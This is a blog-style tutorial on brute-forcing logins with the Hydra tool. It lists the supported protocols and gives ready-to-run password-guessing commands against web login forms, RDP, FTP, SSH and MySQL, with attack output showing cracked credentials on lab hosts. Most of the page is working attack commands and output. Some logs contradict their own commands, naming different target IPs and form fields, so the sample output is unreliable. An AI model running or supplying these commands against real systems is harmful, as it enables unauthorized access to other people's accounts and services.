i Hydra brute force authentication – All things in moderation

Hydra brute force authentication

Hydra is a login cracker tool supports attack numerous protocols. it is very fast and flexible.

SUPPORTED SERVICES:

asterisk cisco cisco-enable
cvs firebird ftp
ftps http[s]-{head|get} icq
http-proxy http-proxy-urlenum http[s]-{get|post}-form
irc ldap2[s] ldap3[-{cram|digest}md5][s]
mssql nntp oracle-listener
oracle-sid pcanywhere pcnfs
pop3[s] postgres rdp
redis rexec rlogin
rsh s7-300 sip
smb smtp[s] smtp-enum
snmp socks5 ssh
sshkey teamspeak telnet[s]
vmauthd vnc xmpp

SYNTAX: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

EXAMPLE:

  1. HTTP POST FORM:

Example brute force attack for url : http://172.16.76.132/wp/Forum/login.php

hydra -l admin -P passList.txt -vV -f -t 2 172.16.76.132 http-post-form "/wp/Forum/login.php:log=^USER^&pwd=^PASS^:login_error"
[email protected]:~# hydra -l admin -P passList.txt -vV -f -t 1 172.16.76.132
 http-post-form "/wp/Forum/login.php:username=^USER^&password=^PASS^:login_error"
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-07-18 08:10:29
[DATA] max 2 tasks per 1 server, overall 64 tasks, 5 login tries (l:1/p:5), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 172.16.76.132 - login "admin" - pass "123" - 1 of 5 [child 0]
[ATTEMPT] target 172.16.76.132 - login "admin" - pass "123456" - 2 of 5 [child 1]
[80][http-post-form] host: 172.16.76.132 login: admin   password: 123456
[STATUS] attack finished for 192.227.171.66 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-07-18 08:11:09

 –l username or -L <usernameList file>: username login

-p password or -P <passwordList file>: password authentication

-t 2 : number of thread, dont’t use too much otherwise you will get false result

-vV: verbose mode / show login+pass for each attempt

-f: stop when found password

– http-post-form : supported service

login_error (grep text from HTML form if login faild)

log (HTML form username input field name )

pwd (HTML form password input field name )

  1. HTTP GET 
hydra -L <username> -P <wordlist> -t 1 -f -vV <ip address> http-get <url directory, i.ex. />
  1. HTTPS GET
hydra -L <username> -P <wordlist> -t 1 -f -vV <ip address> https-get <url directory, i.ex. />

 

  1. RDP (remote desktop)
hydra -t 1 -V -f -l windows -P passList.txt rdp://172.16.76.132
[email protected]:~# hydra -t 1 -V -f -l windows -P passList.txt rdp://192.168.10.118
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-07-18 00:14:10
[DATA] max 1 task per 1 server, overall 64 tasks, 5 login tries (l:1/p:5), ~0 tries per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.10.118 - login "windows" - pass "123" - 1 of 5 [child 0]
[ATTEMPT] target 192.168.10.118 - login "windows" - pass "123456" - 2 of 5 [child 0]
[ATTEMPT] target 192.168.10.118 - login "windows" - pass "owaspbwa" - 3 of 5 [child 0]
[ATTEMPT] target 192.168.10.118 - login "windows" - pass "admin" - 4 of 5 [child 0]
[ATTEMPT] target 192.168.10.118 - login "windows" - pass "1" - 5 of 5 [child 0]
[3389][rdp] host: 192.168.10.118   login: windows   password: 1
[STATUS] attack finished for 192.168.10.118 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-07-18 00:14:14

remote desktop using rdesktop: [email protected]:~# rdesktop 192.168.10.118

  1. FPT
hydra -t 4 -V -f -l root -P passList.txt ftp://172.16.76.132
[email protected]:~/Desktop# hydra -t 4 -V -f -l root -P passList.txt ftp://172.16.76.132
Hydra v8.1 (c)2014 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-07-18 13:45:55
[DATA] 4 tasks, 1 server, 934 login tries (l:1/p:934), ~186 tries per task
[DATA] attacking service ftp on port 21
[ATTEMPT] target 172.16.76.132 - login "root" - pass "123" - 1 of 934 [child 0]
[ATTEMPT] target 172.16.76.132 - login "root" - pass "123456" - 2 of 934 [child 1]
[ATTEMPT] target 172.16.76.132 - login "root" - pass "owaspbwa" - 3 of 934 [child 2]
[ATTEMPT] target 172.16.76.132 - login "root" - pass "admin" - 4 of 934 [child 3]
[ATTEMPT] target 172.16.76.132 - login "root" - pass "administrator" - 5 of 934 [child 1]
[ATTEMPT] target 172.16.76.132 - login "root" - pass "abc" - 6 of 934 [child 0]
[ATTEMPT] target 172.16.76.132 - login "root" - pass "ftpadmin" - 7 of 934 [child 2]
[ATTEMPT] target 172.16.76.132 - login "root" - pass "12345" - 8 of 934 [child 3]
[21][ftp] host: 192.168.67.132   login: root   password: ftpadmin
[STATUS] attack finished for 172.16.76.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-07-18 13:45:55
  1. SSH
hydra -t 5 -V -f -l root -P passList.txt 172.16.76.132 ssh
  1. MySQL
hydra -t 4 -V -f -l root -e ns -P passList.txt 172.16.76.132 mysql

 

 

 

 

Leave a Reply